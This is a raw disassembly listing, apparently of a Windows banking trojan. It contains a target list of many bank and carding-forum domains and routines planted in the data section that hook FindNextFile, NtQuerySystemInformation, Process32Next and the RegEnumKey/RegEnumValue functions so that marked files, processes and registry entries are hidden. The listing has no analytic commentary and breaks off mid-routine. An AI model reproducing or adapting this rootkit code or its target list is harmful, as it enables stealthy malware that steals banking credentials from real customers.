dword_4383A0 dd 0 ; DATA XREF: .text:00401739�w
; .text:loc_40176D�r
dd 40Bh dup(0)
dword_4393D0 dd 0 ; DATA XREF: .text:004089F0�w
; .text:00408A33�r
dd 431h dup(0)
dword_43A498 dd 0 ; DATA XREF: sub_408FEB+6D8�w
; sub_40B525+283�r ...
align 10h
byte_43A4A0 db 0 ; DATA XREF: sub_40211D+CD�w
align 10h
dword_43A4B0 dd 0 ; DATA XREF: .text:00408829�w
; .text:00408864�r
dd 41Fh dup(0)
_bss ends
; Section 3. (virtual address 0003C000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43C000h
dd offset dword_40D000
dd 43B530h, 8000h, 0
dword_43C010 dd 0 ; DATA XREF: sub_40109A+F6�w
; sub_40109A+110�w ...
dword_43C014 dd 12FF74h ; DATA XREF: sub_401219+60�w
dd 0
dword_43C01C dd 0 ; DATA XREF: sub_401219+B�o
dword_43C020 dd 1 ; DATA XREF: sub_401219+44�o
; sub_401219+5A�r
dword_43C024 dd 14B5A0h ; DATA XREF: sub_401219+3F�o
; sub_401219+54�r
dword_43C028 dd 149C48h ; DATA XREF: sub_401219+3A�o
; sub_401219+4E�r
dword_43C02C dd 0 ; DATA XREF: sub_40109A:loc_4011F8�r
; sub_40109A:loc_401208�r
dword_43C030 dd 0 ; DATA XREF: sub_40109A+62�w
dword_43C034 dd 0 ; DATA XREF: sub_40109A+6C�w
; sub_40109A+87�r ...
dword_43C038 dd 0 ; DATA XREF: sub_40109A+74�w
dword_43C03C dd 14h dup(0) ; DATA XREF: sub_40109A+81�o
; sub_40109A+8F�o
dword_43C08C dd 0 ; DATA XREF: sub_40109A+11�w
dword_43C090 dd 0 ; DATA XREF: sub_40109A+16�w
; sub_40109A+32�w
dword_43C094 dd 2 ; DATA XREF: sub_40132A+B5�r
; sub_408FEB+165�r ...
dword_43C098 dd 0Bh ; DATA XREF: sub_408F56+5D�r
; sub_408FEB+14B�r ...
dword_43C09C dd 34h ; DATA XREF: sub_40129C+E�r
; sub_40129C:loc_4012CA�r ...
aKkqhook_30 db 'KKQHOOK_30',0 ; DATA XREF: sub_40AB2B+10�o
; sub_40AB84+52A�o
aFmAfb db 'Fm$afB',0
aB_0 db '',0
unicode 0, <|>,0
dword_43C0B8 dd 0 ; DATA XREF: sub_409A96+10B�r
; sub_409A96+14C�r ...
dword_43C0BC dd 46h ; DATA XREF: sub_409A96+FA7�r
; sub_409A96+FEE�r ...
off_43C0C0 dd offset aSiliconfirewar ; DATA XREF: sub_409A96+111�r
; sub_409A96+152�r
; "siliconfireware.ru"
dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
db 3Eh, 0
aSoftwareMicros db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_409A96+52A�o
; sub_409A96+62C�o ...
aHdbn db 'hDbn-',0
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_409A96+525�o
; sub_409A96+627�o
aUVl db 'U,VL ',0
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_409A96+68C�o
; sub_409A96+848�o
a3X db '3 x',0
align 10h
dword_43C220 dd 0 ; DATA XREF: sub_408165+1C5�w
; sub_40B525:loc_40B6F5�r ...
dword_43C224 dd 0 ; DATA XREF: sub_40B525+8A�r
; sub_40B525+B8�r ...
aKw?b2 db 'KW?B2- ',0
a7dRv db '7d% r',0 ; DATA XREF: sub_40132A+27�o
word_43C237 dw 3Dh ; DATA XREF: sub_40132A:loc_401390�r
align 4
dword_43C23C dd 3Bh ; DATA XREF: sub_401DB9+17�w
; sub_401DB9+A0�w ...
dd 4, 11h
dword_43C248 dd 0 ; DATA XREF: .text:00401446�r
; .text:loc_40145F�r ...
aOajrO db 'oAjR;o-',0 ; DATA XREF: sub_4014CB+43�o
byte_43C254 db 0 ; DATA XREF: sub_4014CB+56�o
aNsg7 db 'nS7',0 ; DATA XREF: sub_4014CB+7C�o
word_43C25A dw 0 ; DATA XREF: sub_4014CB+94�o
dd 4, 11h
dword_43C264 dd 0 ; DATA XREF: .text:0040158F�r
; .text:loc_4015A8�r ...
aOajrO_0 db 'oAjR;o-',0 ; DATA XREF: sub_401614+4D�o
byte_43C270 db 0 ; DATA XREF: sub_401614+60�o
aNsg7_0 db 'nS7',0 ; DATA XREF: sub_401614+86�o
word_43C276 dw 0 ; DATA XREF: sub_401614+9E�o
dd 4, 0Bh
dword_43C280 dd 0 ; DATA XREF: .text:004016F4�r
; .text:loc_40170D�r ...
byte_43C284 db 0 ; DATA XREF: sub_401777+B�o
byte_43C285 db 46h, 26h, 0 ; DATA XREF: sub_401777+56�o
dd 4, 0Bh
dword_43C290 dd 0 ; DATA XREF: .text:00401800�r
; .text:loc_401819�r ...
aPvX db 'PV |x',0 ; DATA XREF: sub_401883+B0�o
align 10h
dd 0Fh
dword_43C2A4 dd 0 ; DATA XREF: .text:0040198C�r
; .text:loc_4019AC�r ...
dd 6, 0Dh
dword_43C2B0 dd 0 ; DATA XREF: .text:00401A69�r
; .text:loc_401A82�r ...
aT db '#, t&',0 ; DATA XREF: sub_401AF1+C�o
byte_43C2BA db 0 ; DATA XREF: sub_401AF1+72�o
byte_43C2BB db 6Fh ; DATA XREF: sub_401AF1+C4�o
dd 3742587Fh, 67h, 6, 0Dh
dword_43C2CC dd 0 ; DATA XREF: .text:00401BE0�r
; .text:loc_401BF9�r ...
dd 5, 0Dh
dword_43C2D8 dd 0 ; DATA XREF: .text:00401D3A�r
; .text:loc_401D53�r ...
dword_43C2DC dd 6D3E72h ; DATA XREF: sub_401DB9+327�r
aE7y db 'e=7y^',0 ; DATA XREF: sub_40211D+38�o
word_43C2E6 dw 36h ; DATA XREF: sub_40211D+4D�r
off_43C2E8 dd offset loc_401E4D ; DATA XREF: sub_401DB9+79�r
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_402086
dd offset loc_402004
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_401EBF
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_401EBF
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_401EBF
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E8A
dd offset loc_401E8A
dd offset loc_401EBF
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401EBF
dd offset loc_401EBF
dd offset loc_401F2C
dd offset loc_401F52
dd offset loc_401FCF
dd offset loc_401F95
dd offset loc_401EAE
dd offset loc_401F83
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401F83
dd offset loc_401F95
dd offset loc_401F83
dd offset loc_401F83
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
off_43C518 dd offset loc_401E4D ; DATA XREF: sub_401DB9+281�r
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401FAC
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401FBF
dd offset loc_401FBF
dd offset loc_401FBF
dd offset loc_401FBF
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401EAE
dd offset loc_401FCF
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401F83
dd offset loc_401F83
dd offset loc_401FE5
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401F83
dd offset loc_401F95
dd offset loc_401FF1
dd offset loc_402086
dd offset loc_401FE5
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E5F
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401E4D
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401EAE
dd offset loc_401FCF
dd offset loc_401FCF
dd offset loc_401FAC
dd offset loc_401EAE
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401EE5
dd offset loc_401FFD
dd offset loc_401F01
dd offset loc_401F01
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E7A
dd offset loc_401E7A
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_401E4D
dd offset loc_401E4D
off_43C6E8 dd offset loc_402046 ; DATA XREF: sub_401DB9+26C�r
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_402086
dd offset loc_40207F
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402063
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402046
dd offset loc_402070
dd offset loc_402046
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402046
dd offset loc_402070
dd offset loc_402046
dd offset loc_40207F
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_402070
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_402046
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_40207F
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
dd offset loc_402086
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C877: ; CODE XREF: .data:0043C8C0�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CA84h
test eax, eax
jz short loc_43C8C2
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C891: ; CODE XREF: .data:0043C897�j
cmp byte ptr [ebx], 0
jz short loc_43C899
inc ebx
jmp short loc_43C891
; ---------------------------------------------------------------------------
loc_43C899: ; CODE XREF: .data:0043C894�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD4BAh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43C8BF
popa
jmp short loc_43C8C2
; ---------------------------------------------------------------------------
loc_43C8BF: ; CODE XREF: .data:0043C8BA�j
popa
jmp short loc_43C877
; ---------------------------------------------------------------------------
loc_43C8C2: ; CODE XREF: .data:0043C884�j
; .data:0043C8BD�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C8F8: ; CODE XREF: .data:0043C947�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CB05h
test eax, eax
jz short loc_43C949
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C912: ; CODE XREF: .data:0043C91A�j
cmp word ptr [ebx], 0
jz short loc_43C91C
inc ebx
inc ebx
jmp short loc_43C912
; ---------------------------------------------------------------------------
loc_43C91C: ; CODE XREF: .data:0043C916�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D641h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43C946
popa
jmp short loc_43C949
; ---------------------------------------------------------------------------
loc_43C946: ; CODE XREF: .data:0043C941�j
popa
jmp short loc_43C8F8
; ---------------------------------------------------------------------------
loc_43C949: ; CODE XREF: .data:0043C905�j
; .data:0043C944�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43C95C dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043CEA8�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43C979: ; DATA XREF: .data:0043CEB0�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245CBAFh
mov [ebp-4], eax
cmp esi, 5
jz short loc_43C9C9
loc_43C9B5: ; CODE XREF: .data:0043C9CF�j
; .data:0043CA22�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43C9C9: ; CODE XREF: .data:0043C9B3�j
cmp edi, 1F40h
jle short loc_43C9B5
jmp short loc_43C9D7
; ---------------------------------------------------------------------------
loc_43C9D3: ; CODE XREF: .data:0043CA24�j
mov esi, ebx
loc_43C9D5: ; CODE XREF: .data:0043CA1C�j
add ebx, eax
loc_43C9D7: ; CODE XREF: .data:0043C9D1�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43C9E5: ; CODE XREF: .data:0043C9F8�j
bt eax, ebx
jb short loc_43C9F0
mov byte ptr [esp+ebx], 30h
jmp short loc_43C9F4
; ---------------------------------------------------------------------------
loc_43C9F0: ; CODE XREF: .data:0043C9E8�j
mov byte ptr [esp+ebx], 31h
loc_43C9F4: ; CODE XREF: .data:0043C9EE�j
inc ebx
cmp ebx, 20h
jnz short loc_43C9E5
push esp
call near ptr 0C4FD60Ch
add esp, 24h
test ax, ax
jnz short loc_43CA0B
popa
jmp short loc_43CA1E
; ---------------------------------------------------------------------------
loc_43CA0B: ; CODE XREF: .data:0043CA06�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43CA1A
mov dword ptr [esi], 0
jmp short loc_43CA1E
; ---------------------------------------------------------------------------
loc_43CA1A: ; CODE XREF: .data:0043CA10�j
add [esi], eax
jmp short loc_43C9D5
; ---------------------------------------------------------------------------
loc_43CA1E: ; CODE XREF: .data:0043CA09�j
; .data:0043CA18�j
mov eax, [ebx]
test eax, eax
jz short loc_43C9B5
jmp short loc_43C9D3
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43CE98�o
word_43CA3A dw 8360h ; DATA XREF: .data:off_43CEA0�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43CA82: ; CODE XREF: .data:0043CAD0�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245CC99h
test eax, eax
jz short loc_43CAD2
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43CAA9: ; CODE XREF: .data:0043CABC�j
bt eax, ebx
jb short loc_43CAB4
mov byte ptr [esp+ebx], 30h
jmp short loc_43CAB8
; ---------------------------------------------------------------------------
loc_43CAB4: ; CODE XREF: .data:0043CAAC�j
mov byte ptr [esp+ebx], 31h
loc_43CAB8: ; CODE XREF: .data:0043CAB2�j
inc ebx
cmp ebx, 20h
jnz short loc_43CAA9
push esp
call near ptr 0C4FD6D0h
add esp, 24h
test ax, ax
jnz short loc_43CACF
popa
jmp short loc_43CAD2
; ---------------------------------------------------------------------------
loc_43CACF: ; CODE XREF: .data:0043CACA�j
popa
jmp short loc_43CA82
; ---------------------------------------------------------------------------
loc_43CAD2: ; CODE XREF: .data:0043CA99�j
; .data:0043CACD�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CAF8: ; CODE XREF: .data:0043CB45�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CD0Bh
test eax, eax
jnz short loc_43CB47
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CB13: ; CODE XREF: .data:0043CB19�j
cmp byte ptr [ebx], 0
jz short loc_43CB1B
inc ebx
jmp short loc_43CB13
; ---------------------------------------------------------------------------
loc_43CB1B: ; CODE XREF: .data:0043CB16�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD73Ch
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CB41
popa
jmp short loc_43CB47
; ---------------------------------------------------------------------------
loc_43CB41: ; CODE XREF: .data:0043CB3C�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CAF8
; ---------------------------------------------------------------------------
loc_43CB47: ; CODE XREF: .data:0043CB0B�j
; .data:0043CB3F�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CB60: ; CODE XREF: .data:0043CBB3�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CD73h
test eax, eax
jnz short loc_43CBB5
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CB7B: ; CODE XREF: .data:0043CB83�j
cmp word ptr [ebx], 0
jz short loc_43CB85
inc ebx
inc ebx
jmp short loc_43CB7B
; ---------------------------------------------------------------------------
loc_43CB85: ; CODE XREF: .data:0043CB7F�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D8AAh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CBAF
popa
jmp short loc_43CBB5
; ---------------------------------------------------------------------------
loc_43CBAF: ; CODE XREF: .data:0043CBAA�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CB60
; ---------------------------------------------------------------------------
loc_43CBB5: ; CODE XREF: .data:0043CB73�j
; .data:0043CBAD�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43CBBC dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h ; DATA XREF: .data:0043CEF8�o
db 0
; ---------------------------------------------------------------------------
loc_43CBCD: ; DATA XREF: .data:0043CF00�o
push ebp
mov ebp, esp
loc_43CBD0: ; CODE XREF: .data:0043CC4B�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CBDE
push dword ptr [eax]
loc_43CBDE: ; CODE XREF: .data:0043CBDA�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CDFDh
test eax, eax
jnz short loc_43CC4D
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CC05: ; CODE XREF: .data:0043CC0D�j
cmp word ptr [ebx], 0
jz short loc_43CC0F
inc ebx
inc ebx
jmp short loc_43CC05
; ---------------------------------------------------------------------------
loc_43CC0F: ; CODE XREF: .data:0043CC09�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D934h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CC39
popa
jmp short loc_43CC4D
; ---------------------------------------------------------------------------
loc_43CC39: ; CODE XREF: .data:0043CC34�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC46
pop dword ptr [eax]
loc_43CC46: ; CODE XREF: .data:0043CC42�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CBD0
; ---------------------------------------------------------------------------
loc_43CC4D: ; CODE XREF: .data:0043CBFD�j
; .data:0043CC37�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CC59
add esp, 4
loc_43CC59: ; CODE XREF: .data:0043CC54�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CC74: ; CODE XREF: .data:0043CCE9�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC82
push dword ptr [eax]
loc_43CC82: ; CODE XREF: .data:0043CC7E�j
push dword ptr [ebp+24h]
